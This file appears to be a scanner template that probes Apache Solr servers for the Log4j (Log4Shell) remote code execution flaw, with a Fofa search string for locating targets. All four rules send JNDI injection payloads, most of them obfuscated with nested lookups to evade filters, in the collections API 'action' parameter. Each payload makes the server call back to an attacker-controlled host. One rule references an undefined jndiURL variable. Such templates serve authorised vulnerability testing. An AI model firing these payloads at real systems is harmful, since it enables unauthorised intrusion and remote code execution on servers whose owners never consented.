id: solr-log4j-rce

info:
  name: Apache Solr Log4j Remote Code Execution
  author: zan8in
  severity: critical
  verified: true
  description: |
    Fofa: app="APACHE-Solr"
  created: 2023/06/09

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /solr/admin/collections?action=${jndi:ldap://{{reverseHost}}}&wt=json
    expression: reverse.wait(5)
  r1:
    request:
      method: GET
      path: /solr/admin/collections?action=${jndi:ldap:${::-/}${::-/}{{reverseHost}}}&wt=json
    expression: reverse.wait(5)
  r2:
    request:
      method: GET
      path: /solr/admin/collections?action=${${X::-j}ndi:rmi:${::-/}${X::-/}{{reverseHost}}}&wt=json
    expression: reverse.wait(5)
  r3:
    request:
      method: GET
      path: /solr/admin/collections?action=${XXX:${${X::-jn}${X::-di}:${X::-l}d${X::-a}p:${X::-/}${X::-/}{{jndiURL}}}&wt=json
    expression: reverse.wait(5)
expression: r0() || r1() || r2() || r3()